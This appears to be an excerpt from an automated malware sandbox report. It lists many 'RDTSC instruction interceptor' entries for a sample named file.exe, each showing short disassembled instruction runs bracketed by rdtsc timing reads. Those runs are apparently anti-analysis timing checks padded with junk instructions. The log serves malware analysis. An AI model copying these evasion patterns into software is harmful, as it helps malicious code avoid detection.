              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B93B2 second address: 9B93DE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3BAC7E5E17h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F3BAC7E5E0Ch 0x0000000f push eax 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B9515 second address: 9B9521 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edi 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C02F6 second address: 9C0314 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F3BAC7E5E10h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jbe 00007F3BAC7E5E12h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C0314 second address: 9C031A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C031A second address: 9C031E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C031E second address: 9C0324 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C0324 second address: 9C0328 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C0328 second address: 9C032E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BF0EE second address: 9BF0FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F3BAC7E5E06h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BF803 second address: 9BF80B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98DC77 second address: 98DC7B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C76FD second address: 9C7701 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C7DEE second address: 9C7DF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F3BAC7E5E06h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C7DF8 second address: 9C7E1A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3BACE24FDFh 0x00000009 jmp 00007F3BACE24FDFh 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C8303 second address: 9C8309 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96FAE0 second address: 96FAE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96FAE5 second address: 96FAEB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96FAEB second address: 96FAEF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C8709 second address: 9C871F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3BAC7E5E12h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C871F second address: 9C873D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F3BACE24FE2h 0x00000008 pushad 0x00000009 popad 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C873D second address: 9C876F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pushad 0x00000008 jmp 00007F3BAC7E5E11h 0x0000000d jmp 00007F3BAC7E5E17h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98FB2F second address: 98FB3D instructions: 0x00000000 rdtsc 0x00000002 jne 00007F3BACE24FD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98FEAB second address: 98FEAF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98FFA8 second address: 98FFAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 990098 second address: 9900A8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3BAC7E5E0Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FC54A second address: 9FC555 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F3BACE24FD6h 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FCE19 second address: 9FCE1D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FCE1D second address: 9FCE33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jmp 00007F3BACE24FDDh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FD4E8 second address: 9FD522 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3BAC7E5E0Ah 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F3BAC7E5E10h 0x0000000f jmp 00007F3BAC7E5E14h 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push ecx 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94B6E9 second address: 94B6ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A14252 second address: A14256 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A13DCD second address: A13DEA instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jl 00007F3BACE24FD6h 0x0000000d push edi 0x0000000e pop edi 0x0000000f jno 00007F3BACE24FD6h 0x00000015 popad 0x00000016 pushad 0x00000017 pushad 0x00000018 popad 0x00000019 push eax 0x0000001a pop eax 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A13DEA second address: A13E04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a jno 00007F3BAC7E5E08h 0x00000010 push eax 0x00000011 push edx 0x00000012 jno 00007F3BAC7E5E06h 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A13E04 second address: A13E0E instructions: 0x00000000 rdtsc 0x00000002 jo 00007F3BACE24FD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95065E second address: 950690 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3BAC7E5E14h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F3BAC7E5E16h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 950690 second address: 95069A instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F3BACE24FD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A24F3C second address: A24F40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A24F40 second address: A24F46 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A24F46 second address: A24F57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007F3BAC7E5E08h 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2CFA1 second address: A2CFAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F3BACE24FDCh 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2B899 second address: A2B8A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2BB5A second address: A2BB5F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2BB5F second address: A2BB6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F3BAC7E5E06h 0x0000000a pop edi 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2BCDF second address: A2BCEA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007F3BACE24FD6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2BCEA second address: A2BCF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2BCF7 second address: A2BD16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jo 00007F3BACE24FE6h 0x0000000b jns 00007F3BACE24FD6h 0x00000011 jmp 00007F3BACE24FDAh 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2BD16 second address: A2BD1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2C214 second address: A2C219 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A305F6 second address: A30601 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A30601 second address: A30607 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A30607 second address: A30610 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4CE71 second address: A4CE7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 js 00007F3BACE24FD6h 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4CE7E second address: A4CE8B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4CE8B second address: A4CE8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A653E1 second address: A653FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3BAC7E5E17h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A653FE second address: A65412 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F3BACE24FDDh 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A65412 second address: A6541E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jc 00007F3BAC7E5E06h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6412E second address: A64149 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jng 00007F3BACE24FDCh 0x0000000b jng 00007F3BACE24FD6h 0x00000011 push eax 0x00000012 push edx 0x00000013 je 00007F3BACE24FD6h 0x00000019 push ebx 0x0000001a pop ebx 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A642B1 second address: A642B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A642B7 second address: A642BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A642BB second address: A642DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007F3BAC7E5E1Bh 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A642DC second address: A64325 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F3BACE24FE4h 0x00000008 push edx 0x00000009 jmp 00007F3BACE24FE8h 0x0000000e pop edx 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F3BACE24FE2h 0x00000019 push ebx 0x0000001a pop ebx 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A64325 second address: A64335 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jnc 00007F3BAC7E5E06h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A64335 second address: A64339 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A64481 second address: A64487 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6460B second address: A6460F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6460F second address: A64643 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F3BAC7E5E0Ah 0x0000000d ja 00007F3BAC7E5E1Ch 0x00000013 jmp 00007F3BAC7E5E16h 0x00000018 popad 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c push edx 0x0000001d pop edx 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A64643 second address: A64662 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F3BACE24FE2h 0x0000000e js 00007F3BACE24FD6h 0x00000014 jp 00007F3BACE24FD6h 0x0000001a pushad 0x0000001b pushad 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A64B0C second address: A64B1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 je 00007F3BAC7E5E06h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A64B1A second address: A64B1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A64B1F second address: A64B36 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3BAC7E5E0Dh 0x00000009 ja 00007F3BAC7E5E06h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A64DAE second address: A64DCA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3BACE24FE8h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A64DCA second address: A64DE3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F3BAC7E5E0Fh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A650BD second address: A650C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A650C4 second address: A65122 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3BAC7E5E0Ch 0x00000007 pushad 0x00000008 jmp 00007F3BAC7E5E0Dh 0x0000000d push eax 0x0000000e pop eax 0x0000000f jmp 00007F3BAC7E5E13h 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push edx 0x00000018 jbe 00007F3BAC7E5E25h 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A65122 second address: A65126 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A66A09 second address: A66A1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jns 00007F3BAC7E5E06h 0x0000000c popad 0x0000000d js 00007F3BAC7E5E0Ch 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6B11C second address: A6B134 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3BACE24FE0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6B134 second address: A6B13E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F3BAC7E5E06h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6B13E second address: A6B174 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jns 00007F3BACE24FDCh 0x00000011 jo 00007F3BACE24FEFh 0x00000017 jmp 00007F3BACE24FE9h 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6ACAA second address: A6ACB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6ACB0 second address: A6ACB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6ACB6 second address: A6ACCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 je 00007F3BAC7E5E0Ch 0x0000000b jno 00007F3BAC7E5E06h 0x00000011 push eax 0x00000012 push edx 0x00000013 js 00007F3BAC7E5E06h 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5470292 second address: 5470298 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5470298 second address: 547029C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 547029C second address: 54702A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54702A0 second address: 54702C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007F3BAC7E5E0Ch 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F3BAC7E5E0Eh 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54702C6 second address: 54702CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54702CC second address: 54702D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54702D0 second address: 54702F3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3BACE24FDDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F3BACE24FDDh 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54702F3 second address: 5470303 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3BAC7E5E0Ch 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5470303 second address: 5470332 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3BACE24FDBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d jmp 00007F3BACE24FE6h 0x00000012 pop ebp 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5470332 second address: 547034A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3BAC7E5E13h 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5470366 second address: 547037F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3BACE24FE5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 547037F second address: 5470384 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5470384 second address: 54703D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ebx, 3BB56BE0h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d jmp 00007F3BACE24FE4h 0x00000012 mov dword ptr [esp], ebp 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 mov bl, 5Ah 0x0000001a pushfd 0x0000001b jmp 00007F3BACE24FE6h 0x00000020 adc si, A088h 0x00000025 jmp 00007F3BACE24FDBh 0x0000002a popfd 0x0000002b popad 0x0000002c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54703D6 second address: 54703DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54703DC second address: 54703E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
